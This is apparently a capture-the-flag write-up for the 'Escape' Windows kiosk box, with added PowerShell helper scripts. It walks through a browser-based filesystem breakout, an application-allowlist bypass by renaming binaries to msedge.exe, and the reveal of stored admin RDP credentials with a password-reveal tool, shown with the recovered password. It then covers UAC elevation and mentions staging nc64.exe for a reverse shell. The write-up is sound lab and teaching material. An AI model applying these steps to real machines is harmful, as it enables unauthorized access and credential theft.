Summary
Escape is a Windows box that exposes only RDP (3389). The RDP session drops you into a locked-down kiosk account (KioskUser0) meant for a "Conference Display" app. The box is solved entirely through a kiosk breakout: abusing Edge's address bar to browse the local filesystem, bypassing an application allowlist by renaming binaries, then finding a third-party RDP client (Remote Desktop Plus) with saved-but-masked credentials for the admin account. Those credentials are recovered with a NirSoft password-reveal tool, and admin turns out to be a local administrator, giving a fully elevated administrator shell after a UAC prompt (and from there, SYSTEM is routine).
Reconnaissance
Only one port open - RDP:
nmap -A -Pn <machine-ip> -oA nmap
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
Full port scan confirmed only 3389/tcp is reachable. Product_Version 10.0.19041 is a Windows 10 (2004-era) build, and the NetBIOS domain name being identical to the computer name (ESCAPE) indicates a standalone workgroup box rather than a domain member.
Added it to hosts and connected:
echo '<machine-ip> escape.vl ESCAPE.VL' >> /etc/hosts
xfreerdp /v:<machine-ip> /cert:ignore /sec:tls
The login screen tells you exactly what to do:
Conference Display - Login as KioskUser0 without Password
Foothold - Breaking Out of the Kiosk
Logging in as KioskUser0 drops you straight into a wallpaper ("Busan Expo") with no visible taskbar or icons. Clicking around does nothing.
- Pressing the Windows key brings up the Start menu / search bar.
- Searching for cmd and clicking it does nothing (blocked).
- Searching for edge opens it successfully. So the restriction looks like an allowlist, not a blocklist: only specific apps (such as Edge) are permitted to launch.
- With Edge open, typing C:\ directly into the address bar renders a directory listing of the filesystem (Edge treats it as a local file:// browse). This is enough to walk the entire disk from the browser.
Browsing to the kiosk user's desktop:
C:\Users\KioskUser0\Desktop\user.txt
user.txt: [REDACTED]
Getting a real shell - allowlist bypass
Browsing to C:\Windows\System32\, I located cmd.exe and downloaded it via Edge into the Downloads folder. Running it directly failed:
The error dialog (in Korean) read:
제한 사항
이 작업은 시스템 제한 때문에 취소되었습니다. 시스템 관리자에게 문의하십시오.
which translates to: "Restriction: This operation was cancelled due to system restrictions. Contact your system administrator."
Renaming it to an arbitrary name didn't help either. But since Edge (msedge.exe) is the one thing the allowlist is known to permit, renaming cmd.exe to msedge.exe and running it bypassed the restriction entirely and popped a working shell:
C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0
C:\Users\kioskUser0\Downloads>whoami /all
USER INFORMATION
----------------
User Name SID
escape\kioskuser0 S-1-5-21-3698417267-3345840482-3422164602-1002
GROUP INFORMATION (relevant)
BUILTIN\Remote Desktop Users
BUILTIN\Users
Mandatory Label\Medium Mandatory Level
PRIVILEGES INFORMATION
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
Same rename trick works for powershell.exe (download it, rename to msedge.exe, run it) to get a real PowerShell session instead of cmd.
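Rather than renaming by trial and error, it is worth establishing what the launch restriction actually keys on, because that decides whether a rename is enough or whether you need a binary the policy already trusts. The script below is an added example, not part of the original writeup: it copies powershell.exe into Downloads under three names (its real name, an arbitrary name, and the allowlisted msedge.exe), records which ones the policy lets start, and then dumps hints about the enforcing mechanism (effective AppLocker policy and the Software Restriction Policies registry key) if either is present. The candidate names, the Downloads folder and the use of powershell.exe as the probe binary are assumptions; it expects to be run from the shell already obtained inside the kiosk session.

```powershell
# Added example (not from the original writeup). Assumes a shell inside the kiosk
# session, e.g. the renamed cmd.exe described above; paths are assumptions.

$Source = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$Folder = Join-Path $env:USERPROFILE 'Downloads'

# Candidate file names: the real name, an arbitrary name, and the allowlisted one.
# Only 'msedge.exe' launching  -> policy keys on the bare file name (rename works).
# Arbitrary name also launches  -> it is a blocklist, not an allowlist.
# Nothing launches              -> path, hash or publisher rules; a rename is not enough.
$Candidates = @('powershell.exe', 'notanapp.exe', 'msedge.exe')

function Test-LaunchByName {
    param(
        [string]$SourcePath,
        [string]$TargetFolder,
        [string[]]$Names
    )
    $results = foreach ($name in $Names) {
        $target = Join-Path $TargetFolder $name
        Copy-Item -Path $SourcePath -Destination $target -Force
        try {
            # The child just exits. If the policy blocks the image, process creation
            # fails and Start-Process throws (typically "blocked by group policy").
            $proc = Start-Process -FilePath $target -ArgumentList '-NoProfile', '-Command', 'exit 0' `
                                  -PassThru -Wait -WindowStyle Hidden -ErrorAction Stop
            [pscustomobject]@{ Name = $name; Launched = $true;  Detail = "exit code $($proc.ExitCode)" }
        } catch {
            [pscustomobject]@{ Name = $name; Launched = $false; Detail = $_.Exception.Message }
        }
    }
    return $results
}

function Get-AllowlistPolicyHints {
    # AppLocker: the effective policy (as XML text) lists FilePath/FileHash/FilePublisher rules.
    $applocker = Get-AppLockerPolicy -Effective -Xml -ErrorAction SilentlyContinue
    # Software Restriction Policies live here when configured.
    # DefaultLevel 0 = Disallowed (allowlist), 0x40000 = Unrestricted (blocklist).
    $srpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    $srp    = Get-ItemProperty -Path $srpKey -ErrorAction SilentlyContinue
    $ruleTypes = if ($applocker) {
        ([regex]::Matches($applocker, 'File(Path|Hash|Publisher)Rule ') |
            ForEach-Object { $_.Value.Trim() } | Sort-Object -Unique) -join ', '
    } else { '' }
    [pscustomobject]@{
        AppLockerConfigured = [bool]$applocker
        AppLockerRuleTypes  = $ruleTypes
        SrpConfigured       = [bool]$srp
        SrpDefaultLevel     = if ($srp) { '0x{0:X}' -f [int]$srp.DefaultLevel } else { $null }
    }
}

Test-LaunchByName -SourcePath $Source -TargetFolder $Folder -Names $Candidates | Format-Table -AutoSize
Get-AllowlistPolicyHints | Format-List
```

If neither AppLocker nor SRP shows up but the launch results still differ by name, the restriction is being applied by something else (a kiosk/assigned-access configuration or a third-party agent), and the launch table is the only reliable evidence you have.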
Enumeration as kioskuser0
PS C:\Users> dir
admin
Administrator
DefaultAppPool
kioskUser0
Public
PS C:\Users> cd .\admin\
dir : Access to the path 'C:\Users\admin' is denied.
PS C:\Users> net user
admin Administrator DefaultAccount
Guest kioskUser0 WDAGUtilityAccount
Can't read admin's profile directly, but a hidden admin-owned folder is visible at the root of C:\:
PS C:\> Get-ChildItem -Force
d--h-- _admin
...
d----- temp
PS C:\_admin> ls
installers/
passwords/
temp/
Default.rdp
profiles.xml
profiles.xml is a config file for a third-party RDP client:
PS C:\_admin> type .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
The password is a 44-character base64 string that decodes to 32 bytes, and the decoded bytes do not start with the DPAPI blob header, so this is app-specific encryption rather than base64-encoded plaintext or a user-bound DPAPI secret. Rather than reverse the scheme, the plan is to load the file into the actual Remote Desktop Plus app and let the GUI decrypt it for us.
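Before committing to the GUI route it is worth classifying the blob, because what it is decides who can decrypt it: a DPAPI blob (recognisable by a fixed header) is bound to the owning user and would be unreadable from the kiosk account, whereas an app-specific reversible scheme can be undone by anyone who feeds the file back to the application. The script below is an added example, not part of the original writeup: it parses a profiles.xml (a sample constructed here from the values shown above) and reports, per profile, the decoded size, whether the DPAPI header is present, whether the bytes are all printable (which would mean the "encryption" is just base64), and the byte entropy. The DPAPI header constant is the documented version-plus-provider-GUID prefix; the sample document and the Downloads path in the comment are assumptions.

```powershell
# Added example (not from the original writeup): triage the <Password> value in a
# Remote Desktop Plus profiles.xml before deciding how to recover it.

# Constructed sample mirroring the file found in C:\_admin (the XML declaration is
# omitted on purpose). For the real file use:
#   [xml](Get-Content -Raw "$env:USERPROFILE\Downloads\profiles.xml")
# Get-Content honours the UTF-16 BOM the real file carries.
$SampleXml = @'
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>
'@

# A DPAPI blob begins with version 1 followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in on-disk (little-endian) byte order.
$DpapiHeaderHex = '01000000D08C9DDF0115D1118C7A00C04FC297EB'

function Get-ShannonEntropy {
    param([byte[]]$Bytes)
    $counts = @{}
    foreach ($b in $Bytes) { $counts[$b] = 1 + [int]$counts[$b] }
    $h = 0.0
    foreach ($c in $counts.Values) {
        $p = $c / $Bytes.Length
        $h -= $p * [Math]::Log($p, 2)
    }
    return [Math]::Round($h, 2)   # bits per byte; 8.0 is the maximum
}

function Get-StoredPasswordInfo {
    param([xml]$Document)
    # SelectNodes returns a node list, so one or many <Profile> entries enumerate alike.
    foreach ($entry in $Document.SelectNodes('/Data/Profile')) {
        $b64   = $entry.Password
        $bytes = [Convert]::FromBase64String($b64)
        $head  = ([BitConverter]::ToString($bytes, 0, [Math]::Min(20, $bytes.Length))) -replace '-', ''
        $nonPrintable = @($bytes | Where-Object { $_ -lt 0x20 -or $_ -gt 0x7E }).Count
        [pscustomobject]@{
            Profile       = $entry.ProfileName
            Secure        = $entry.Secure
            Base64Length  = $b64.Length
            DecodedBytes  = $bytes.Length
            IsDpapiBlob   = ($head -eq $DpapiHeaderHex)
            PrintableOnly = ($nonPrintable -eq 0)
            EntropyBits   = Get-ShannonEntropy -Bytes $bytes
        }
    }
}

Get-StoredPasswordInfo -Document ([xml]$SampleXml) | Format-List
```

For the value above the output shows 32 decoded bytes, IsDpapiBlob False and PrintableOnly False: a fixed-size, high-entropy, non-DPAPI blob, which is exactly the case where the application itself is the easiest decryption oracle.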
Recovering the Password
Remote Desktop Plus is installed under Program Files (x86):
PS C:\Program Files (x86)> ls
Remote Desktop Plus/
PS C:\Program Files (x86)\Remote Desktop Plus> ls
rdp.exe
Since C:\_admin isn't writable/reachable from the app's file picker, first copy profiles.xml somewhere the low-priv user can access:
copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\
Ran rdp.exe → Manage Profiles → Import → selected the copied profiles.xml. The admin profile now loads in the app, with the password field shown as bullets (••••••••). Double-clicking / editing / copying the field is all blocked — no cleartext, no clipboard.
To reveal it, used a Nirsoft tool that reads masked password fields from Windows dialogs: BulletsPassView.
# attacker box
unzip bulletspassview.zip
python3 -m http.server 80
Downloaded BulletsPassView.exe onto the target from http://<your-ip>/BulletsPassView.exe (using Edge again, since it is the one browser that is allowed to run), ran it against the open Remote Desktop Plus dialog, and it revealed the masked field:
Password: Twisting30217
Privilege Escalation — kioskuser0 → admin
Confirmed admin is a local administrator:
PS C:\temp> net user admin
Local Group Memberships *Administrators
Password required No
First attempt with runas didn't give an elevated shell (whoami still showed kioskuser0 afterwards, likely a profile/token quirk with runas in this restricted context):
runas /user:admin powershell
Instead, spawning PowerShell with an elevation request worked and triggered a normal UAC consent prompt:
Start-Process powershell.exe -Verb runas
The prompt asked to allow Windows PowerShell (Microsoft-signed) to make changes — clicked Yes, and landed in an elevated shell:
PS C:\Windows\system32> whoami
escape\admin
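Under UAC, "running as an administrator" and "elevated" are not the same thing: a process started with an admin's credentials through runas gets that user's filtered, medium-integrity token, on which the Administrators SID is present but deny-only, while only a process that went through the consent or credential prompt (what Start-Process -Verb runas requests) carries the full high-integrity token. The function below is an added example, not part of the original writeup: run it in any shell to see which of the two you actually have, instead of inferring it from whoami alone. It assumes an English whoami output for the integrity-level line and falls back to "unknown" otherwise.

```powershell
# Added example (not from the original writeup): tell an elevated shell apart from
# a medium-integrity shell that merely belongs to an administrator.

function Get-TokenElevationInfo {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity

    # S-1-5-32-544 is BUILTIN\Administrators. On a UAC-filtered token the SID is still
    # listed but marked deny-only, so IsInRole() (a real membership check) returns $false.
    $hasAdminSid = $identity.Groups.Value -contains 'S-1-5-32-544'
    $isElevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # Integrity level from the mandatory label line of whoami /groups:
    # High = elevated, Medium = filtered/standard. Assumes English output.
    $labelLine = (whoami /groups | Select-String 'Mandatory Level' | Select-Object -First 1).Line
    $integrity = if ($labelLine -match '\\(\w+) Mandatory Level') { $Matches[1] } else { 'unknown' }

    $verdict = if ($isElevated) {
        'full administrator token'
    } elseif ($hasAdminSid) {
        'administrator, but filtered token: request elevation (Start-Process -Verb runas)'
    } else {
        'standard user'
    }

    [pscustomobject]@{
        User           = $identity.Name
        HasAdminSid    = $hasAdminSid
        IsElevated     = $isElevated
        IntegrityLevel = $integrity
        Verdict        = $verdict
    }
}

Get-TokenElevationInfo | Format-List
```

A shell where User is escape\admin but IsElevated is False and IntegrityLevel is Medium is the runas case; the Start-Process -Verb runas shell above should report IsElevated True and IntegrityLevel High.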
Root Flag
PS C:\Users\Administrator\Desktop> ls
Microsoft Edge.lnk
root.txt
PS C:\Users\Administrator\Desktop> type .\root.txt
[REDACTED]
At this point you're escape\admin, a full local administrator with no shell restrictions. From here you can also drop nc64.exe, catch a reverse shell, and go on to SYSTEM without any of the kiosk-mode limitations.
Key Vulnerabilities & Attack Chain
- Kiosk breakout via browser LOLBin: Edge's address bar accepts local paths (C:\) and renders a full directory listing, giving filesystem access from a "locked down" kiosk session.
- Weak application allowlist: the restriction keys on the executable's file name rather than its hash, publisher signature or full path, so simply renaming cmd.exe / powershell.exe to msedge.exe bypasses it entirely.
- Recoverable stored credentials: Remote Desktop Plus stores the admin RDP credentials in C:\_admin\profiles.xml, which the kiosk user can read. The stored password is encrypted in a form the application reverses for whoever imports the file, not bound to the owning user (as DPAPI would be), and the GUI's masking is only a UI control, trivially defeated with a generic password-reveal tool (BulletsPassView).
- Weak/no password policy: the admin account has "Password required: No" set and a simple password (Twisting30217).
- Standard UAC consent: once valid admin credentials/session are available, Start-Process -Verb runas plus accepting the UAC prompt is enough to get a fully elevated administrator shell.
Attack Chain
RDP → KioskUser0 (no password)
│
├── Kiosk breakout
│ ├── Win key → Start search
│ │ ├── "cmd" → blocked (allowlist)
│ │ └── "edge" → allowed
│ └── Edge address bar → C:\ (file:// directory listing)
│ └── user.txt [FLAG 1]
│
├── Shell access
│ ├── Download cmd.exe / powershell.exe from System32
│ ├── Rename → msedge.exe
│ └── Run → allowlist bypassed → shell as escape\kioskuser0
│
├── Credential discovery
│ ├── C:\_admin\profiles.xml (Remote Desktop Plus config)
│ ├── copy → C:\Users\kioskUser0\Downloads\
│ ├── Import into rdp.exe (Remote Desktop Plus GUI)
│ │ └── password shown as ●●●●●●●● (masked)
│ └── BulletsPassView.exe (hosted on attacker box, downloaded to target)
│ └── reveals password → Twisting30217
│
└── Privilege escalation
├── net user admin → member of Administrators
├── runas /user:admin powershell → didn't elevate
└── Start-Process powershell -Verb runas
└── UAC prompt → Yes → escape\admin
└── root.txt [FLAG 2]